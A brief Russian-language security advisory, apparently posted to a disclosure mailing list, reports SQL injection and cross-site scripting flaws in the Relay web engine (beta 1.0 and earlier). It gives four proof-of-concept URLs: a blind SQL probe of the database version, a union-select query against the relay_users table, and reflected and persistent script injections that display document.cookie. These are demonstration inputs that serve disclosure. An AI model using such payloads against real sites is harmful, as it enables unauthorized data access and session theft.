Здравствуйте 3APA3A!
Сообщаю вам о найденных мною новых SQL Injection и Cross-Site Scripting уязвимостях в движке Relay.
SQL Injection:
http://site/relay/management/index.php?page=manage&module=users&action=setEmail&uid=1%20and%20substring(version(),1,1)=3&email=1
XSS:
http://site/relay/relay.php?relay=getFile&fileid=1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20relay_users/*%3Cscript%3Ealert(document.cookie)%3C/script%3E
XSS:
http://site/relay/management/index.php?page=manage&module=users&action=setEmail&uid=and%3Cscript%3Ealert(document.cookie)%3C/script%3E&email=1
XSS (Persistent):
http://site/relay/management/index.php?page=manage&module=users&action=setEmail&uid=1&email=%3Cscript%3Ealert(document.cookie)%3C/script%3E
Уязвима версия Relay beta 1.0 (и предыдущие версии).
Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/2075/
Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua